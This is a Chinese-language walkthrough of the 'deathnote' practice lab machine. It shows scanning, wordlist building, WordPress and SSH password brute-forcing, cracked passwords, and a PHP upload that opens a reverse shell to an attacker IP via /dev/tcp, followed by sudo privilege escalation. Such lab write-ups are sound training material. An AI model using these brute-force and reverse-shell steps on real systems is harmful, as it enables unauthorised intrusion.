deathnote靶机攻略

deathnote

扫描及信息搜集

此靶机需要修改/etc/hosts添加dns,不然无法跳转主页

nmap -sV -A -p- 10.4.7.133

dirsearch -u http://10.4.7.133

deathnote靶机攻略_第1张图片

deathnote靶机攻略_第2张图片

http://10.4.7.133/robots.txt

在此目录下发现提示

deathnote靶机攻略_第3张图片

访问下,发现无法正常显示

deathnote靶机攻略_第4张图片

wget http://10.4.7.133/important.jpg

cat important.jpg

deathnote靶机攻略_第5张图片

提示在hint

deathnote靶机攻略_第6张图片

需要找到notes.txt和user.txt,再使用dirb扫描看看结果

dirb http://10.4.7.133 

在结果中尝试访问

http://10.4.7.133/wordpress/wp-content/uploads/2021/07/

deathnote靶机攻略_第7张图片

找到这两个文件

使用wget下载这两个文件

deathnote靶机攻略_第8张图片

使用爬取将密码写入一个文件

cewl http://deathnote.vuln/wordpress/ -w kirapasswd.txt

再把hint页中的这条加入密码本,将notes.txt也放入密码本

deathnote靶机攻略_第9张图片

密码爆破

wpscan --url http://10.4.7.133/wordpress/ -U user.txt -P kirapasswd.txt

image-20231012170433547

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f -t 50 

deathnote靶机攻略_第10张图片

l
death4me

渗透

deathnote靶机攻略_第11张图片

此处发现上传框,尝试上传木马

木马内容

& /dev/tcp/10.4.7.130/12138 0>&1'"); ?>

deathnote靶机攻略_第12张图片

点击木马文件复制url

deathnote靶机攻略_第13张图片

kali开启nc

nc -lvvp 12138

随后访问复制的url执行木马即可反弹成功

家目录l目录下发现user.txt文件,该密码文件为brainfuck

deathnote靶机攻略_第14张图片

解码结果为如图

deathnote靶机攻略_第15张图片

上述信息没发现有啥作用

在/opt目录下有信息文件

deathnote靶机攻略_第16张图片

deathnote靶机攻略_第17张图片

image-20231012205709700

尝试解码

deathnote靶机攻略_第18张图片

deathnote靶机攻略_第19张图片

如图16进制解码再用base64解码得到密码

passwd : kiraisevil

尝试使用su root或者sudo -l发现不能使用

使用上面九头蛇爆破的ssh l登录,发现和反弹shell的用户没什么区别

于是将密码新破解的密码放入密码字典再次尝试爆破,看看是不是其它用户的密码

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f 50

image-20231012213347476

得到新用户

kira
kiraisevil

提权

deathnote靶机攻略_第20张图片

登录kira账户

查看id发现有sudo权限

执行sudo -l发现有sudo所有权限

执行sudo su root完成提权

image-20231012213924737

你可能感兴趣的:(靶机系列,网络安全,web安全,安全威胁分析,安全,密码学,其他,笔记)